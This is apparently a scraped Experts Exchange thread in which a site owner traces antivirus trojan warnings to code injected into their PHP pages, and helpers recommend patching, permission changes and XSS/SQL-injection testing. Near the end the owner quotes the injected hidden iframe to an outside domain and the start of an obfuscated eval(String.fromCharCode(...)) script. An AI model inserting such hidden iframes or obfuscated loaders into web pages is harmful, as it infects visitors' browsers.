oh_maestro
asked on
Help! My website is causing browsers to get HTML:IFrame-EE Trojan! and Mal/EncPk-F & Mal/HckPk-A also
I have a web site (I will give you the URL if someone says it is OK) in which I've had a couple browsers get this message from AVAST:
HTML:IFrame-EJ [trj]
Type: Trojan Horse
I also have once gotten the malware Mal/EncPk-F and Mal/HckPk-A (Sophos Anti-Virus) when visiting the site.
My hosting is through Go Daddy, and they insist there is no virus or trojan on their end.
Don't get me wrong - the website usually works without a problem; but we are getting ready to promote the website & I don't want any hint of malware coming to my site.
My site is on a UNIX server and I am using PHP & MySQL. I am using sessions on every page.
HTML:IFrame-EJ [trj]
Type: Trojan Horse
I also have once gotten the malware Mal/EncPk-F and Mal/HckPk-A (Sophos Anti-Virus) when visiting the site.
My hosting is through Go Daddy, and they insist there is no virus or trojan on their end.
Don't get me wrong - the website usually works without a problem; but we are getting ready to promote the website & I don't want any hint of malware coming to my site.
My site is on a UNIX server and I am using PHP & MySQL. I am using sessions on every page.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Increasing Pts!
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
PHP4 is pretty old, you should upgrade if possible. There were several SQL injection attacks against that version of DW, make sure it's patched and updated: http://secunia.com/advisories/product/3194/?task=advisories
Find anything that is not yours on your server, and clean it out. Then chmod 644 every directory that does not need write access. Is this a godaddy server? they should provide more up to date instances of PHP.
http://www.UnmaskParasites.com/security-report/?page=openhousesohio.com
http://www.google.com/safebrowsing/diagnostic?site=openhousesohio.com
https://www.google.com/accounts/ServiceLoginAuth?service=sitemaps
http://www.directadmin.com/forum/showthread.php?p=157818
-rich
Find anything that is not yours on your server, and clean it out. Then chmod 644 every directory that does not need write access. Is this a godaddy server? they should provide more up to date instances of PHP.
http://www.UnmaskParasites.com/security-report/?page=openhousesohio.com
http://www.google.com/safebrowsing/diagnostic?site=openhousesohio.com
https://www.google.com/accounts/ServiceLoginAuth?service=sitemaps
http://www.directadmin.com/forum/showthread.php?p=157818
-rich
I think your login form needs sanitization, download xss-me and sql-inject-me firefox extentions. Go to your login page, right click and select "open xss me sidebar" or the sql-inject me side bar, run all tests.
Read up on input validation/sanitization, xss and sql injection: http://shiflett.org/articles
I think he wrote and developed mysql_real_escape_string for php: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
http://code.google.com/p/inspekt/
-rich
Read up on input validation/sanitization, xss and sql injection: http://shiflett.org/articles
I think he wrote and developed mysql_real_escape_string for php: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
http://code.google.com/p/inspekt/
-rich
ASKER
The long Javascript code at the end was the culprit. Someone had hacked into my website and put that at the bottom of the page. I was able to get it removed from my site, and I have a whole new list of tougher passwords.
Thanks!
Thanks!
Glad to help, and beyond password choices input validation is a must to avoid sql injection. The site looks solid from a xss point of view, but sql injection on your login form could be worse.
Good luck!
-rich
Good luck!
-rich
Thats good stuff! Thanks for the feedback :)
ASKER
Using Firebug, I found this:
<iframe height="3" width="1" src="http://foxionserl.com/">
and this
<script type="text/javascript">
eval(String.fromCharCode(1
I did not type any of this code.
I do not see this code when I go to View+Source in IE. I also do not see anything like this on my code.
My main editor is Macromedia Dreamweaver MX 2004, and I have to FTP files to my GoDaddy account. I am using PHP 4.
Has my site been hacked?